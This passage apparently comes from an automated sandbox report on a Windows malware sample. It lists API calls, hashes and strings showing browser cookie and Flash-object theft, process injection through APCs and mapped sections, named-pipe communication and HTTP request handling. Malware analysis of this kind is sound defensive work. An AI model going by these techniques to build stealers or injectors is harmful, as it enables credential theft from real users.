  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF422, Relevance: 10.6, APIs: 7, Instructions: 85 Total matches: 37registrylibraryloader
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C51AB, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 438 Total matches: 26synchronizationmemorythread
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
